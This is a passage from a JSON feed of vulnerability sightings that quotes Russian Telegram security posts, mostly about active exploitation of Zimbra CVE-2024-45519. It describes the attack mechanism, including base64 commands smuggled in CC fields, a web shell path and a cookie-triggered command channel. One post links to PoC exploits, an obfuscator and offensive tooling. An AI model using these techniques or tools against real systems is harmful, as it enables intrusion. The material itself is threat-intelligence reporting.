\u0432\u0437\u044f\u0442\u044c \u043f\u043e\u0434 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u044b Ivanti Virtual Traffic Manager (vTM). \u0410\u0442\u0430\u043a\u0438 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 CVE-2024-7593, \u043a\u043e\u0442\u043e\u0440\u0443\u044e Ivanti \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435, \u0438 \u043d\u0430 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u0443\u0436\u0435 \u0438\u043c\u0435\u043b\u0441\u044f PoC.\n\n5. VulnCheck\u00a0\u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0432\u0441\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0430 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0430\u044f APT Flax Typhoon \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043b\u0438\u043a\u0432\u0438\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043d\u0430 \u0434\u043d\u044f\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Raptor Train. \u0418\u0445 \u0447\u0438\u0441\u043b\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u043e - 66!", "creation_timestamp": "2024-09-25T17:30:05.000000Z"}, {"uuid": "581897e9-51fd-4657-91f1-623b35ed08a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/true_secator/6271", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Zimbra postjournal, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u0442\u0430\u0440\u0442\u043e\u0432\u0430\u043b\u0430 \u0447\u0435\u0440\u0435\u0437 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f PoC.\n\nCVE-2024-45519 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 Zimbra \u0432\u0435\u0440\u0441\u0438\u0439 9.0.0 Patch 41, 10.0.9, 10.1.1 \u0438 8.8.15 Patch 46.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u044f\u043c\u0438, \u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0435\u0449\u0435 \u043d\u0435 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 NIST (NVD), \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 ProjectDiscovery \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c\u00a0ProjectDiscovery, \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u00a0\u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0438 \u043e\u0447\u0438\u0441\u0442\u043a\u0438 \u0432\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0445, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c SMTP-\u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0441\u043b\u0443\u0436\u0431\u0443 Postjournal.\n\n\u041f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0441\u043b\u0443\u0436\u0431\u0430 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430, \u043d\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430, \u0435\u0441\u043b\u0438 \u0430\u0442\u0430\u043a\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u0437 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0430 \u0441\u0435\u0442\u0438.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-45519 \u0431\u044b\u043b\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u0432\u043e\u0430\u043d\u044b Proofpoint \u0443\u0436\u0435 28 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f, \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a ProjectDiscovery \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0430 \u0441\u0432\u043e\u0439 \u043e\u0442\u0447\u0435\u0442 \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u041f\u0438\u0441\u044c\u043c\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u043a\u043e\u0439 \u043f\u043e\u0434 Gmail \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0438\u0441\u044c \u043d\u0430 \u0444\u0435\u0439\u043a\u043e\u0432\u044b\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u0432 \u043f\u043e\u043b\u044f\u0445 CC, \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u044b Zimbra \u0438\u0445 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u0430\u043a \u043a\u043e\u043c\u0430\u043d\u0434\u044b. \u0410\u0434\u0440\u0435\u0441\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u0441\u0442\u0440\u043e\u043a\u0438 base64, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0442\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b sh.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u043b\u0430 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 CC, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u0432\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u043d\u0430 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Zimbra \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443: \u00ab/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp\u00bb.\n\n\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0430 \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u0435\u0442 \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0437\u0430\u0440\u0430\u043d\u0435\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044f cookie JSESSIONID \u0438, \u0435\u0441\u043b\u0438 \u043e\u043d\u043e \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442, \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0430\u0435\u0442 \u043a \u0430\u043d\u0430\u043b\u0438\u0437\u0443 cookie JACTION \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434 Base64.\n\n\u0412\u0435\u0431-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0430 \u043e\u0441\u043d\u0430\u0449\u0435\u043d\u0430 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0447\u0435\u0440\u0435\u0437 exec. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u044b \u043e\u043d\u0430 \u0442\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0444\u0430\u0439\u043b \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442\u043d\u043e\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c HarfangLab \u0418\u0432\u0430\u043d \u041a\u0432\u044f\u0442\u043a\u043e\u0432\u0441\u043a\u0438 \u0432\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a \u0442\u0430\u043a\u0436\u0435\u00a0\u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0436\u0430\u043b \u043e\u0431 IP, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u043b\u0438\u0441\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2024-45519.\n\nProofpoint \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043a\u0430\u043a \u043f\u0438\u0441\u0435\u043c \u0441 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430\u043c\u0438, \u0442\u0430\u043a \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u044d\u0442\u0430\u043f\u0430, \u043d\u043e \u043f\u043e\u043a\u0430 \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0438 \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0441 \u043a\u0430\u043a\u0438\u043c-\u043b\u0438\u0431\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u043e\u043c \u0443\u0433\u0440\u043e\u0437.\n\n\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Synacor \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0432\u043d\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 postjournal, \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u0430\u0442\u0447, \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e. \n\n\u0414\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c Zimbra, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043e \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e, \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0434\u0432\u043e\u0438\u0447\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 postjournal \u043c\u043e\u0436\u043d\u043e \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u043a\u0430\u043a \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u043c\u0435\u0440\u0443 \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.", "creation_timestamp": "2024-10-02T12:24:36.000000Z"}, {"uuid": "82940bad-130e-40cd-8064-c1dbc248b1e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7519", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "5d4b28b4-0f93-432d-8a2c-5dcee9b9c11f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Revolution/24", "content": "\ud83c\udccf  CVE-2024-45519 is a vulnerability in Zimbra Collaboration (ZCS) that allows unauthenticated users to execute commands through the postjournal service. This guide walks you through setting up a lab environment to reproduce the issue and execute the exploit. \ud83c\udccf \n\nhttps://github.com/Chocapikk/CVE-2024-45519", "creation_timestamp": "2024-10-05T11:50:39.000000Z"}, {"uuid": "f812860e-ad60-4ef1-931c-57fb064f835e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/true_secator/6268", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c \u0441 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u0432\u043a\u0440\u0430\u0442\u0446\u0435 \u043f\u043e \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u043c \u043d\u0430 \u043d\u0435\u0434\u0435\u043b\u0435 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:\n\n1. \u0424\u0440\u0430\u043d\u0446\u0443\u0437\u0441\u043a\u0430\u044f LEXFO \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0447\u0440\u0435\u0437\u0432\u044b\u0447\u0430\u0439\u043d\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 JupiterX WordPress \u0438 WooCommerce. \n\n\u042d\u0442\u043e \u043e\u0431\u0445\u043e\u0434 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438 RCE, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0430\u0439\u0442\u044b.\n\n\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0444\u043e\u0440\u043c\u0443 \u0441 \u043f\u043e\u043b\u0435\u043c \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0444\u0430\u0439\u043b\u0430.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c JupiterX \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043e\u0441\u044c\u043c\u043e\u0439 \u0438\u0437 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u043e\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0445 \u043d\u0430 \u043f\u043b\u043e\u0449\u0430\u0434\u043a\u0435 ThemeForest \u0441 \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c 178 000 \u043f\u0440\u043e\u0434\u0430\u0436.\n\n2. VideoLAN \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u043c\u0435\u0434\u0438\u0430\u043f\u043b\u0435\u0435\u0440\u0430 VLC \u0434\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043f\u043e\u0442\u043e\u043a MMS.\n\n3. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Project Discovery \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b Zimbra, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-45519 \u0438 \u0432\u043b\u0438\u044f\u0435\u0442 \u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0443 PostJournal, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430\u0445.\n\nZimbra \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0438 \u0437\u0430 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044c.\n\n4. \u00a0\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u041f\u0430\u0442\u0440\u0438\u043a \u041a\u043e\u0432\u0430\u043b\u044c\u0441\u043a\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0431\u0445\u043e\u0434\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f iOS Screen Time. \n\n\u041e\u0448\u0438\u0431\u043a\u0443 \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f Screen Time \u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0438.\n\n5. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Assetnote \u043d\u0430\u0448\u043b\u0438\u00a0\u0430\u043d\u043e\u043c\u0430\u043b\u0438\u044e\u00a0\u0432 \u0432\u0435\u043b\u0438\u043a\u043e\u043c \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u043c \u0444\u0430\u0439\u0440\u0432\u043e\u043b\u0435, 